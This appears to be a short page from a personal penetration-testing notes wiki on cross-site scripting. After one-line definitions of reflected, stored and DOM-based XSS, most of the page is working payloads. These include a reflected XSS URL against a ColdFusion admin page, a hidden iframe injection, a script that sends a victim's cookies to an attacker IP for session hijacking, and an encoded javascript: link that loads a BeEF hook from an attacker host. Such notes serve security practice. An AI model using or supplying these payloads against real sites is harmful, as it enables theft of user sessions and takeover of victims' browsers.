XSS

Reflected XXS

Script returns from current HTTP request

Stored XSS

Script ‘stored’ on website's db

DOM-Based

vulnerability exists in client-side code rather than on the server itself

https://riptutorial.com/php/example/11883/cross-site-scripting--xss-

Reflected XSS

Generic Test:

<script>alert(1)</script>

Example:

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?>'"><script>alert('Hello')</script>

Content Injection:

<iframe src=http://10.11.0.4/report height=”0” width=”0”></iframe>

Cookie Stealing:

<script>new Image().src="http://10.11.0.4/cool.jpg?output="+document.cookie;</script>

Will need to wait for the user to login in order to receive it.

Once received, the cookie value can be replaced in browser either in the dev tools or cookie editor extension

Inject JS

javascript:%20(function%20()%20{%20var%20url%20=%20%27http://192.168.119.212:3000/hook.js%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();

PreviousBlind Injection Sample Script NextAuthentication

Last updated 3 years ago